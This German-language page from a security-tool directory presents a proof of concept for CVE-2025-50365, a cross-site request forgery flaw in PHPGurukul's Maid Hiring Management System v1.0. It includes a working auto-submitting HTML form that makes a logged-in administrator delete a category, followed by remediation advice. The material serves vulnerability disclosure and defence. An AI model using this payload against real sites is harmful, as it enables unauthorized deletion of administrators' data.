Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, das unbefugte Löschen von Kategorien durch manipulierte bösartige Links demonstriert. | Kitploit
Tools/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, das unbefugte Löschen von Kategorien durch manipulierte bösartige Links demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

Projektname & Repo-URL: Maid Hiring Management System mit PHP und MySQL

Schwachstellentyp: Clientseitige Request-Fälschung

Betroffene Version(en): v1.0

💣Schwachstellenbeschreibung: Eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle existiert im Admin-Panel des PHPGurukul Hiring Management Systems, die es einem Angreifer ermöglicht, beliebige Einstellungskategorien zu löschen, indem er einen authentifizierten Administrator dazu bringt, eine bösartige Seite zu besuchen. Dies kann zu Datenlöschung und unbefugten Änderungen auf Admin-Ebene führen.

👩‍💻Auswirkungen: Unberechtigte Löschung von Kategorien.

🛜Proof-of-Concept (PoC):

  1. Es gab eine Funktion zum Löschen von Kategorien, bei der nur authentifizierte Administratoren Kategorien löschen konnten. 1
  2. HTML-Code, um eine GET-Anfrage an den Endpunkt /admin/manage-category.php zu senden CSRF-POC
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/manage-category.php">
      <input type="hidden" name="delid" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Verwenden Sie den HTML-Code und erstellen Sie eine bösartige URL. 3
  2. Nachdem der Administrator auf den Link klickt, wird die Kategorie gelöscht. 4 5

Empfehlung: Implementierung von CSRF-Tokens in Admin-Formularen, Durchsetzung von SameSite-Cookies und Validierung des Anfragenursprungs, um unbefugte Aktionen zu verhindern.

Tool herunterladen